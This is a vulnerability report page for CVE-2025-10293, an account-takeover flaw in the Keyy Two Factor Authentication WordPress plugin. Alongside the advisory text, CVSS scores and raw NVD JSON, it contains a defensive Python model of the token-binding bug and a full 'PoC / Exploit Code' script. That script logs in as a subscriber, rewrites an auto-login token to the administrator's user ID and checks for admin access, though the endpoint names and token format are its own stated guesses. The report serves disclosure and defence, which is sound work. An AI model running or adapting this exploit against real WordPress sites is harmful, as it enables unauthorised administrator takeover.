Security Vulnerability Report

CVE-2025-10293

Published: 2025-10-15 09:15:39
Last Modified: 2026-04-15 00:35:42

Description

The Keyy Two Factor Authentication (like Clef) plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.2.3. This is due to the plugin not properly validating a user's identity associated with a token generated. This makes it possible for authenticated attackers, with subscriber-level access and above, to generate valid auth tokens and leverage that to auto-login as other accounts, including administrators, as long as the administrator has the 2FA set up.
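The flaw described above is an auto-login token that can be redeemed for an account other than the one it was issued to (CWE-287). The following Python model is an added illustration of that pattern, not code from the Keyy plugin or from the advisory: it contrasts an unsigned `nonce:user_id` token whose redemption trusts the user ID it carries with one whose subject is taken from the authenticated session at issuance, recorded server-side, HMAC-tagged, time-limited and single-use. The class and function names, the token layout and the user table are constructed for the example; the real plugin's token format and endpoints are not published in the advisory.

```python
"""Auto-login tokens: user ID carried in the clear vs. bound to the issuer.

Added example modelling the CWE-287 pattern behind CVE-2025-10293; not the
Keyy plugin's code. Names, token layout and user table are constructed.
"""
import hashlib
import hmac
import secrets
import time

# Constructed sample user table: user id -> role
USERS = {1: "administrator", 7: "subscriber"}


class VulnerableTokenService:
    """Flawed pattern: the token is "<nonce>:<user_id>" and redemption only
    checks that the nonce was issued, not who it was issued to. Any holder of
    a valid token can rewrite the user ID and log in as that account."""

    def __init__(self):
        self.issued = set()

    def issue(self, session_user_id):
        nonce = secrets.token_hex(16)
        self.issued.add(nonce)
        return f"{nonce}:{session_user_id}"

    def redeem(self, token):
        nonce, user_id = token.split(":", 1)
        if nonce not in self.issued:
            return None
        self.issued.discard(nonce)          # single-use, but unbound
        return int(user_id)                  # trusts the client-supplied ID


class HardenedTokenService:
    """Fixed pattern: the subject comes from the authenticated session, the
    server records who the nonce belongs to, and the client-visible token is
    HMAC-tagged and time-limited. Redemption returns the server-side binding,
    never the user ID the client presented."""

    def __init__(self, key):
        self.key = key
        self.issued = {}  # nonce -> (user_id, expiry)

    def issue(self, session_user_id, ttl=60, now=None):
        now = int(time.time()) if now is None else now
        nonce = secrets.token_hex(16)
        expiry = now + ttl
        payload = f"{nonce}:{session_user_id}:{expiry}"
        tag = hmac.new(self.key, payload.encode(), hashlib.sha256).hexdigest()
        self.issued[nonce] = (session_user_id, expiry)
        return f"{payload}:{tag}"

    def redeem(self, token, now=None):
        now = int(time.time()) if now is None else now
        try:
            nonce, user_id, expiry, tag = token.split(":")
        except ValueError:
            return None                      # malformed
        payload = f"{nonce}:{user_id}:{expiry}"
        expected = hmac.new(self.key, payload.encode(), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(tag, expected):
            return None                      # tampered user ID or expiry
        record = self.issued.pop(nonce, None)  # consume: single-use
        if record is None:
            return None                      # unknown or already used
        bound_user, bound_expiry = record
        if now > bound_expiry:
            return None                      # expired
        return bound_user                    # server-side binding wins


def retarget(token, target_user_id):
    """The tampering an attacker relies on: overwrite the second ':' field."""
    parts = token.split(":")
    parts[1] = str(target_user_id)
    return ":".join(parts)


def attempt_takeover(service, attacker_id=7, target_id=1):
    """Subscriber obtains a token for itself, retargets it at the admin and
    redeems it. Returns the user ID the service logs in, or None."""
    token = service.issue(attacker_id)
    return service.redeem(retarget(token, target_id))


if __name__ == "__main__":
    got = attempt_takeover(VulnerableTokenService())
    print("vulnerable service logged in as:", got, USERS.get(got))
    got = attempt_takeover(HardenedTokenService(secrets.token_bytes(32)))
    print("hardened service logged in as:", got)
```

The point of the hardened variant is that the user ID the client presents is never the source of truth: the MAC rejects any edit to the token, and even a MAC-valid token resolves to the user recorded at issuance. Binding the subject to the session at issue time, not just signing whatever the request names, is the part of the fix that closes the subscriber-to-administrator path.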

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No NVD CPE configuration data is available for this entry (vulnStatus: Deferred). Per the description, the affected product is:

Keyy Two Factor Authentication plugin for WordPress, all versions <= 1.2.3

Weakness: CWE-287 (Improper Authentication)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-10293 PoC - Keyy Two Factor Authentication Privilege Escalation
# Vulnerability: Improper token validation allows account takeover
# Affected: Keyy plugin versions <= 1.2.3
#
# Note: the advisory does not publish the plugin's endpoint names or token
# format. The admin-ajax action "keyy_get_token", the "keyy_token" query
# parameter and the colon-separated token layout below are this PoC's
# assumptions and must be confirmed against the plugin source before use.
import requests

TARGET_URL = "http://target-wordpress-site.com"
ATTACKER_USER = "attacker_subscriber"
ATTACKER_PASS = "attacker_password123"
TARGET_ADMIN_ID = 1  # Default WordPress admin user ID


def modify_token_user_id(token, target_user_id):
    """
    Modify the token's associated user ID.

    Due to improper validation, the Keyy plugin accepts tokens with
    modified user identifiers. This is a simplified representation of the
    token manipulation: it assumes a "<value>:<user_id>[:...]" layout.
    """
    parts = token.split(":")
    if len(parts) >= 2:
        parts[1] = str(target_user_id)
    return ":".join(parts)


def exploit_keyy_privilege_escalation():
    session = requests.Session()

    # Step 1: Login as low-privilege subscriber user
    print("[*] Step 1: Logging in as subscriber-level attacker...")
    login_url = f"{TARGET_URL}/wp-login.php"
    # WordPress sets a test cookie on the login form; fetch it first so the
    # POST is not rejected with "Cookies are blocked".
    session.get(login_url)
    login_data = {
        "log": ATTACKER_USER,
        "pwd": ATTACKER_PASS,
        "wp-submit": "Log In",
        "redirect_to": f"{TARGET_URL}/wp-admin/",
        "testcookie": "1",
    }
    session.post(login_url, data=login_data)
    if not any(c.name.startswith("wordpress_logged_in_") for c in session.cookies):
        print("[-] Login failed: no wordpress_logged_in_ cookie set")
        return False

    # Step 2: Request authentication token from Keyy plugin
    print("[*] Step 2: Requesting auth token from Keyy plugin...")
    keyy_token_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    token_params = {
        "action": "keyy_get_token",  # assumed action name, see note above
    }
    token_response = session.post(keyy_token_url, data=token_params)
    try:
        auth_token = token_response.json().get("token")
    except ValueError:
        auth_token = None
    if not auth_token:
        print(f"[-] No token in response (HTTP {token_response.status_code})")
        return False
    print(f"[+] Obtained auth token: {auth_token[:20]}...")

    # Step 3: Manipulate token to target admin user
    print(f"[*] Step 3: Manipulating token to target admin user (ID: {TARGET_ADMIN_ID})...")
    # The vulnerability exists because the plugin does not properly
    # bind the token to the requesting user's identity
    manipulated_token = modify_token_user_id(auth_token, TARGET_ADMIN_ID)

    # Step 4: Use manipulated token to auto-login as admin
    print("[*] Step 4: Using manipulated token to auto-login as admin...")
    auto_login_url = f"{TARGET_URL}/?keyy_token={manipulated_token}"  # assumed parameter
    session.get(auto_login_url, allow_redirects=True)

    # Step 5: Verify admin access. Only users with the list_users capability
    # get the user list table; a subscriber gets a 403 "not allowed" page,
    # so match on the table rather than on the word "admin", which appears
    # in every wp-admin URL and would give a false positive.
    admin_check = session.get(f"{TARGET_URL}/wp-admin/users.php")
    if admin_check.status_code == 200 and "wp-list-table" in admin_check.text:
        print("[+] SUCCESS! Logged in as administrator!")
        return True
    print("[-] Exploitation failed")
    return False


if __name__ == "__main__":
    exploit_keyy_privilege_escalation()
```

References

https://wordpress.org/plugins/keyy/
https://www.wordfence.com/threat-intel/vulnerabilities/id/1850e6bd-04bc-4510-aba9-e51431363231?source=cve
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-10293",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-15T09:15:38.850",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Keyy Two Factor Authentication (like Clef) plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.2.3. This is due to the plugin not properly validating a user's identity associated with a token generated. This makes it possible for authenticated attackers, with subscriber-level access and above, to generate valid auth tokens and leverage that to auto-login as other accounts, including administrators, as long as the administrator has the 2FA set up."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-287"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://wordpress.org/plugins/keyy/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1850e6bd-04bc-4510-aba9-e51431363231?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```